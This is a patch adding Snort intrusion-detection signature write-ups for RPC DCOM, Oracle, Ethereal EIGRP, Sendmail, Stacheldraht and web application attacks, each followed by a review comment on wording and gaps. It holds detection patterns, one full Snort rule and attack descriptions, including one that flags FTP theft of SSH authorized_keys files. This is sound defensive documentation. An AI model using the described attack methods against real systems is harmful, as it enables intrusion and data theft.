+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
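Review bot: the file starts with two empty added lines before `Rule:`, which no other file in this patch has; drop them so the files parse uniformly. In the Summary, `may indicate that an exploitation attempt has been attempted` should be `may indicate an exploitation attempt`, and `ona web server` in Detailed Information should be `on a web server`. As with the other remote file include entries in this patch, the credential-validation paragraph and the Attack Scenarios text about supplying credentials do not match the `includepath` inclusion in `mambo.inc.php` that the rule actually covers.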
--- /dev/null
+++ b/doc/signatures/3430.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3430
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
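Review bot: `Simple. Expoit code exists.` under Ease of Attack should read `Exploit`. `Additional References:` is empty although the Detailed Information describes a specific Microsoft RPC DCOM buffer overflow; list the vendor bulletin and CERT advisory for it, as 2308.txt does for the Workstation service issue. Note that the whole body of this file, apart from the Sid, is identical to 3319.txt later in this patch; since two rules exist, each file should state what distinguishes the traffic its rule matches.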
--- /dev/null
+++ b/doc/signatures/2464.txt
@@ -0,0 +1,70 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT EIGRP prefix length overflow attempt";
+ip_proto:88; byte_test:1,>,32,44; reference:cve,CAN-2004-0176;
+reference:bugtraq,9952; classtype:attempted-admin; sid:2464; rev:1;)
+
+--
+Sid:
+2464
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Enhanced Interior Gateway Routing Protocol 
+(EIGRP).
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed EIGRP packet is decoded.  This
+may permit the execution of arbitrary code with root or LOCAL_SYSTEM privilege.
+The buffer overflow occurs when a larger than expected packet length value is
+discovered in the EIGRP payload.
+
+--
+Affected Systems:
+Any host running Ethereal versions 0.8.14 through 0.10.2.
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed EIGRP packet, and if decoded by
+a vulnerable version of Ethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952
+
+--
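Review bot: `Additional References` is missing its trailing colon, unlike every other file in this patch. This is the only file here that fills in the `Rule:` field, which is the right thing to do; but because `byte_test:1,>,32,44` examines one byte at a fixed offset, the False Negatives field should describe what that single-offset check covers rather than stating `None known`.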
--- /dev/null
+++ b/doc/signatures/1927.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid: 
+1927
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+In this case, the rule will generate an event due to the attempted
+transfer of an authorized_keys file. This file is used in ssh
+communications to authenticate a user without the need for a password.
+Retrieval of this file may allow an attacker to gain valuable
+information about the hosts allowed to gain access to the machine via
+ssh, included the hostname, IP address and the username belonging to the
+authorized user. The attacker may have access to the users .ssh directory in 
+which case the public and private keys for that user may also be at risk.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+The manual page for ssh on the system in question.
+
+--
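Review bot: the `Affected Systems:` section is missing altogether (Detailed Information runs straight into Attack Scenarios), and `Sid: ` carries trailing whitespace. In the Detailed Information paragraph, `included the hostname, IP address and the username` should be `including the hostname, IP address and the username`, and `the users .ssh directory` should be `the user's .ssh directory`. The Corrective Action of using ssh in place of FTP is sound; it would also help to name `authorized_keys` in the Summary, since that file is what distinguishes Sid 1927 from generic FTP events.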
--- /dev/null
+++ b/doc/signatures/2891.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2891
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
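Review bot: the Detailed Information text breaks mid-sentence: `vulnerability in the procedure drop_priority_number` is followed by a line beginning `. This procedure is included in`, leaving a full stop at the start of a line; join these so the sentence reads `... the procedure drop_priority_number. This procedure is included in sys.dbms_repcat_conf.` The Affected Systems entry `Oracle Oracle9i` repeats the vendor name, several header lines (`Rule: `, `Sid: `, `-- `) carry trailing whitespace, and `Additional References:` is empty for a named procedure overflow, so the vendor alert should be listed.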
--- /dev/null
+++ b/doc/signatures/1585.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1585
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
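Review bot: the Summary and Detailed Information never say which vulnerability or which request pattern Sid 1585 detects (`a known vulnerability on a web server or a web application` and `the attack scenarios are legion` would cover any web rule), so an analyst reading this file cannot triage the event; name the application and the request the rule matches, and fill in `Rule:` and `Additional References:`. Also `the attackers choosing` should be `the attacker's choosing`, a spelling that recurs throughout this patch.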
--- /dev/null
+++ b/doc/signatures/3319.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3319
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
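Review bot: apart from the Sid, this file is a verbatim copy of 3430.txt earlier in this patch, including the `Expoit` typo under Ease of Attack; fix the spelling here too and add a sentence to Detailed Information saying which RPC DCOM request or interface Sid 3319 matches, otherwise two rules share one indistinguishable description. `Additional References:` is empty here as well.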
--- /dev/null
+++ b/doc/signatures/836.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+836
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
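Review bot: `running ona web server` in Detailed Information should be `running on a web server`, and the line `relationships between the victim server and other hosts can be exploited by the attacker.` runs well past the wrap width the rest of the file keeps. More importantly, the text is the generic CGI template: nothing says which CGI script or request Sid 836 fires on, and `Rule:` and `Additional References:` are empty, so the file gives an analyst no way to check the alert against the actual signature.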
--- /dev/null
+++ b/doc/signatures/225.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+225
+
+--
+Summary:
+This event is generated when the Stacheldraht DDoS tool is used.
+
+--
+Impact:
+This indicates that a Stacheldraht agent exists on the source host and a handler exists on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler may probe for a Stacheldraht agent.  There is also "gag" program used to scan for Stacheldraht agents.  A response to a "gag" request will be an ICMP echo reply with an ICMP identification number of 669 and a string of "sicken" in the payload.  
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A handler may probe for a Stacheldraht agent or the "gag" program can be used to discover Stacheldraht agents.  The "gag" program can be run by a defender of a network if there is a suspected Stacheldraht agent on the network. An attacker could also run the "gag" program to find an agent.
+
+
+--
+Ease of Attack:
+Simple. The "gag" script is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Turn of all unnecessary services on hosts.
+
+Upgrade to the latest patch level.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS195
+
+--
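Review bot: `Turn of all unnecessary services` under Corrective Action should be `Turn off`. The Summary (`when the Stacheldraht DDoS tool is used`) is broader than what the Detailed Information describes, namely an ICMP echo reply with identification number 669 and `sicken` in the payload, which is an agent's response to a handler or `gag` probe; state that in the Summary so the Impact line (`an agent exists on the source host and a handler exists on the destination host`) follows from it. Minor: `The Stacheldraht DDoS uses` should be `The Stacheldraht DDoS tool uses`, and `There is also "gag" program` needs an article.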
--- /dev/null
+++ b/doc/signatures/655.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+655
+
+--
+Summary:
+This event is generated when a buffer overflow is attempted on a Sendmail 8.6.9 server.
+
+--
+Impact:
+Attempted administrator access.  A successful buffer overflow attack can allow a remote attacker access to the Sendmail server at the privilege level of the user ID associated with Sendmail.
+
+--
+Detailed Information:
+A vulnerability exists in Sendmail version 8.6.9 that can be exploited by a buffer overflow attack.  This allows the attacker access to the Sendmail server at the privilege level of the user ID associated with Sendmail.  This attack can occur when a Sendmail server connects back to the ident service of the client requesting the Sendmail connection.  Because it is improperly validated by the Sendmail server, a malicious response can cause a buffer overflow. 
+
+--
+Affected Systems:
+Sendmail version 8.6.9.
+
+--
+Attack Scenarios:
+An attacker can request a connection to a Sendmail server, listen for the request for the ident service, and respond with a malicious payload to exploit the vulnerability.
+
+--
+Ease of Attack:
+Easy.  Exploit code is available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to a Sendmail version greater than 8.6.9.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Rule updated by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+
+--
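Review bot: in Detailed Information, `Because it is improperly validated by the Sendmail server` leaves `it` unclear; say `Because the ident response is improperly validated by the Sendmail server`. `Easy.` under Ease of Attack differs from the `Simple.` wording every other file uses, and there is a stray extra blank line before the closing `--`. Otherwise the file is a good model for the rest of the patch: it names the version, the mechanism (the ident callback) and the CVE.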
--- /dev/null
+++ b/doc/signatures/704.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+704
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
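Review bot: `Affected Systems:` is empty, and the Summary names only `a known vulnerability in Microsoft SQL` without saying which one Sid 704 detects, so the file cannot be used to judge an alert; fill in at least the product versions and the request the rule matches, and add the vendor reference under `Additional References:`. The Corrective Action advice to disallow administrative access from outside the protected network is specific and useful; the rest of the file should be brought up to that level.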
--- /dev/null
+++ b/doc/signatures/100000504.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000504
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "media.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "media.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
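Review bot: the blank line before `--` is missing after the Sid value `100000504` and after the Affected Systems entry, and there is an extra blank added line after the final `--`, so the file does not match the layout of the other entries; `running ona web server` should be `running on a web server`. As with 100000590.txt and 100000438.txt in this patch, the credential-validation paragraph and the Attack Scenarios text describe a login weakness rather than the `DIR_LIB` remote file include in `media.php` that the Summary names.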
--- /dev/null
+++ b/doc/signatures/2888.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2888
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
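Review bot: The procedure name in Detailed Information is split across a line break, leaving the sentence's full stop stranded at the start of the next line ("vulnerability in the procedure drop_priority_char" / ". This procedure is included in"); rejoin it as "...the procedure drop_priority_char. This procedure is included in sys.dbms_repcat_conf." Under Affected Systems, "Oracle Oracle9i" repeats the vendor name; "Oracle9i" suffices. Additional References is empty although the Summary calls this a known vulnerability; add the vendor alert the rule is based on.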
--- /dev/null
+++ b/doc/signatures/3197.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+3197
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This event indicates that an attempt to exploit this vulnerability via
+the ISystemActivator component has been made.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
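Review bot: Two spelling errors: "Simple. Expoit code exists." under Ease of Attack should read "Exploit", and "Block access to port 69 used by the worm to propogate." under Corrective Action should read "propagate". The same Corrective Action item names port 69 without saying what it is; Detailed Information already identifies TFTP as the worm's transfer mechanism, so write "port 69 (TFTP)" so the reader connects the two.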
--- /dev/null
+++ b/doc/signatures/1227.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1227
+
+--
+Summary:
+This event is generated when an attempt is made to communicate to an internal host from a remote X server session.
+
+--
+Impact:
+Remote access.  This attack may indicate that an internal host has been compromised and has been configured to offer remote access through an xterm session.
+
+--
+Detailed Information:
+Traffic from source ports 6000 through 6005 inclusive may indicate that an internal host is communicating with an external host using an xterm session.  An attacker may compromise an internal host and establish communications between the remote host and the compromised host using an xterm session.  This is particularly effective means of establishing communications because the xterm session is established by the internal host.  Typically, firewalls do not scrutinize or block outbound traffic, such as establishing an xterm session. 
+
+--
+Affected Systems:
+Host offering xterm client software. 
+
+--
+Attack Scenarios:
+An attacker may establish communications using an xterm session between a compromised host and remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A remote host may connect to an internal host with a source port of 6000 through 6005 inclusive.
+
+--
+False Negatives:
+If multiple concurrent xterm sessions exists, a port greater than 6005 may be selected.
+
+--
+Corrective Action:
+Block outbound xterm sessions.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Documented by  Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+Additional References:
+http://www.whitehats.com/info/IDS126
+
+--
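Review bot: The "--" separator between the Contributors list and "Additional References:" is missing (two blank lines stand in its place), which breaks the section layout every other signature file follows. Grammar: "This is particularly effective means" needs "a", and "If multiple concurrent xterm sessions exists" should be "exist". Corrective Action says only "Block outbound xterm sessions."; since Detailed Information names ports 6000 through 6005, state that the outbound filter should cover that range so the advice is actionable.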
--- /dev/null
+++ b/doc/signatures/3342.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3342
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
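Review bot: This file is the text of 3197.txt with the ISystemActivator paragraph and the worm references removed, and nothing in Detailed Information says which request or interface distinguishes sid 3342 from sids 3197, 3229 and 3316; add a sentence naming what this rule matches on, as 3197 does with "This event indicates that an attempt to exploit this vulnerability via the ISystemActivator component has been made." Typo under Ease of Attack: "Expoit" should read "Exploit".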
--- /dev/null
+++ b/doc/signatures/100000562.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000562
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sort" parameter in the "show.php" script used 
+by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
